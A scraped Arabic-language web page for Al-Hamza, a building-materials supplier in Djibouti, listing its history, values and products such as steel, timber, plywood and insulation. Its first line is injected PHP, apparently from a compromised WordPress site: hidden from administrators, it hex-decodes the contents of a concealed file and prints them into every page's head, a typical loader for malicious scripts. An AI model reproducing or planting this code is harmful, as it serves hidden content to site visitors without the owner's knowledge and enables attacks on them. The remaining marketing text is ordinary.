if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } الحمزة لمواد البناء – أبو أحمد التجارية

الحمزة لمواد البناء وأدوات الكهرباء

نوفر جميع أصناف مواد البناء بجودة عالية ونسخر خبرتنا الطويلة في خدمة عملائنا

دعنا نتحدث عن

تأسست شركة الحمزة عام 2010 م
والآن أصبحت من أكبر شركات توريد وبيع مواد البناء ( جملة وتجزئة ) في سوق دولة جيبوتي .
حققت شراكات إستراتيجية مع عملائها أساسها جودة المنتجات ، التسليم في الوقت المحدد ، وتقديم خدمات متطورة .
استطاعت وفي فترة زمنية وجيزة و من خلال الخبرة التي اكتسبتها في كيفية تلبية احتياجات السوق أن تنهض و تتطور بخطى ثابتة لتحتل مرتبة متقدمة في سوق مواد البناء و قد كان لها ذلك من خلال :
التنسيق مع الشركات العالمية والمحلية المصنعة لمـواد البناء بمواصفات و جودة عالية.
التميز في تقديم أفضل الخدمات لعملائها .
الانتشار والتوسع على مستوى الدولة.
العمل على تدريب وتطوير موظفيها واستقطاب الخبرات المتميزة.

القيــم

العمل المؤسسي – الربح – العدل والأمانة – الشفافية – التميز – النماء

رسالتنــا

مشاركة عملائنا في البناء والتشييد من خلال توفير مواد بناء متنوعة وبأسعار منافسة وبفريق عمل متميز.

رؤيتنــا

التميز والنماء في مواد البناء، وتوفير كل ما يخص هذا المجال والحفاظ على الرياده في مجال مواد البناء.

منتجات تتحدث عن نفسها


إن تعاقدنا مع أكبر مصنعي وموزعي الحديد المعتمدين في داخل الدولة وخارجها ، وقدرتنا على بناء علاقات إستراتيجية وتعاقدات مع أفضل المصانع العالمية مكن الشركة من توفير أصناف الحديد بمختلف المقاسات وبجودة عالية لعملائها.
تمتاز شركة الحمزه بخدمة توصيل الطلبات إلى مواقع العملاء ، ففي كل فرع من مخازننا يوجد عدد من القلابات الخاصة بنقل جميع أنواع الحديد المختلفة


توفر شركة الحمزة أنواع متعددة من المرابيع و من مصادر عالمية لامعة بمجال الأخشاب نذكر منها: النمسا,ماليزيا واندونيسيا. حيث تتماشى هذه الأصناف مع جميع احتياجات مجال البناء.


توفر شركة ألحمزة لمواد البناء تشكيلة واسعة ومتعددة المقاسات من أفضل أنواع الخشب الأبيض المستخدم في أعمال البناء حيث يتم التعاقد مع أفضل الشركات العالمية الرائدة بصناعة الأخشاب بمختلف البلدان كالنمسا وماليزيا واندونيسيا.


هو عبارة عن ألواح تستخدم في عمليات الصبة ولها تصنيفات مختلفة يعطي كل منها جودة معينة ، مهمتها الأساسية جعل سطوح الصبة ملساء لتسريع عمليات البناء واختصار الزمن ، سماكة كل لوح 18مم وهو مؤلف من 13 طبقة متلاصقة فوق بعضها البعض و تتميز تبعاً لنوعية الغراء المستخدم بين هذه الطبقات.


توفر الشركة جميع مقاسات وكميات شبك الصبيات الإسمنتية بمواصفات عالمية وجودة عالية كما تتوفر لدينا جميع المقاسات وبالكميات المطلوبة.


عوازل حرارية:
المشمع بأنواعه من 100 ميكرو سماكة وحتى 1000 ميكرو وأبعادها 4م × 15م وهو يحافظ على مستوى الماء بالصبة الخرسانية خلال عمليات التفاعل ويعطي السطح الشكل الأملس والذي يسهل عمليات اللياسة والديكور.
عوازل مائية:
العوازل الاسفلتية بأنواعها.
العوازل البيتومينية للاستخدام البارد ولها دور اساسي بعمليات العزل للاسطح والجدران والأساسات وتتحمل درجة حرارة مباشرة تصل إلى 50 درجة.
لفات رول 1م × 4م غير مؤكسدة تقبل التقطيع أو مؤكسد مع شبكة فيبر داخلية.


يستخدم لتثبيت الألواح الخشبية المختلفة ويتم تصنيعه حسب المقياسوله قياسان ( 5 سم – 6 سم ).


سلك يستخدم لربط جميع انواع الحديد قطر سلك التربيط 22مم ، ووزنه 8 كغ أو 7 كغ للفة الواحدة ، ومصدره صيني.